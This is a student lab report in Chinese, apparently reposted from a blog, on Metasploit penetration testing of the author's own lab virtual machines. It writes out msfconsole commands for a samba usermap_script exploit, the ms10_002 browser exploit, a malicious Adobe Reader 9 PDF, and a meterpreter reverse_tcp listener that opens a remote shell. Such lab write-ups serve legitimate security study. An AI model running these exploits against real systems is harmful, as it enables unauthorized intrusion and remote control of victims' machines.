网络与系统攻防技术|实验六 Metasploit攻击渗透实践
作者:互联网
网络与系统攻防技术
实验六 Metasploit攻击渗透实践
dky 20192414 袁浩然
实践目标
-
本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:
- 一个主动攻击实践,尽量使用最新的类似漏洞;
- 一个针对浏览器的攻击,尽量使用最新的类似漏洞;
- 一个针对客户端的攻击,如Adobe或office,尽量使用最新的类似漏洞;
- 成功应用任何一个辅助模块。
-
以上四个小实践可不限于以上示例,并要求至少有一个是和其他所有同学不一样的,否则扣除1分。
实验过程
实验一 一个主动攻击实践(samba漏洞)
-
获得ubuntu靶机的IP地址
-
使用nessus对ubuntu靶机进行扫描,发现samba漏洞
-
kali启动msf查找samba模块,发现有好几个
-
使用其中一个samba模块进行攻击,设置目的主机,攻击成功!!!
msfconsole use exploit/multi/samba/usermap_script set rhosts 172.17.140.212 run
实验二 一个针对浏览器的攻击(ms10_002)
-
确定XP靶机IP地址
-
kali启动msf查找ms10_002模块
-
设置目的主机和网页url,执行
msfconsole search ms10_002 use 0 set serhost 192.168.152.138 set uripath 20192414 run
-
xp靶机打开
192.168.152.130:8080/20192414
网页
-
成功连接
实验三 针对客户端的攻击(adobe reader 9)
-
确定XP靶机IP地址,在XP靶机安装adobe reader 9
-
use windows/fileformat/adobe_cooltype_sing
使用adobe reader 攻击模块 -
设置主机IP和主机端口,生成pdf文件
-
kali打开效果
-
使用exploit/multi/hander监听
-
在windowsxp使用adobe reader 9 打开
-
连接成功!
msfconsole use windows/fileformat/adobe_cooltype_sing set lhost 192.168.152.130 set lport 4444 exploit msfconsole use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 192.168.152.130 set lport 4444 exploit
实验四 成功应用任何一个辅助模块
-
使用
show auxiliary
查看所有辅助功能
-
最后选择使用最简单的nmap对靶机进行扫描
问题及解决方案
- 问题一
- kali攻击不成功
- 出现以下原因有很多
- kali防火墙未关(kali的防火墙必须关,靶机的防火墙可关可不关)
- 操作系统的版本不对,此漏洞可能已经修复。比如攻击浏览器漏洞,使用win7的IE就不尽人意
- 软件版本不对,adobe reader的版本不为9,可能会导致攻击不成功
- 解决方案
- ufw disable 关闭防火墙
- 换操作系统
- 换软件版本
- 问题二
- 木马文件闪退
- 出现以下原因也有很多
- 靶机的内存不足,打开直接闪退
- 操作系统或者软件版本不对
- 解决方案
- 加内存
- 换操作系统或者版本
实验感想
- 实验一为我自己通过nessus对ubuntu靶机进行扫描,发现很多高危漏洞,然后一个一个进行百度搜索,发现samba漏洞有可利用的空间。然后搜索如何用msfconsole对samba进行渗透,最后成功。这是我自己探索发现并成功渗透的漏洞,非常有成就感
- 其他漏洞都通过学长或者同学的博客找到的。在这些实验中,没有复杂的命令,但是需要有耐心,不断换操作系统和软件,最后终于攻击成功!
标签:Metasploit,攻防,set,adobe,渗透,漏洞,samba,攻击,靶机 来源: https://www.cnblogs.com/yhr001/p/16275296.html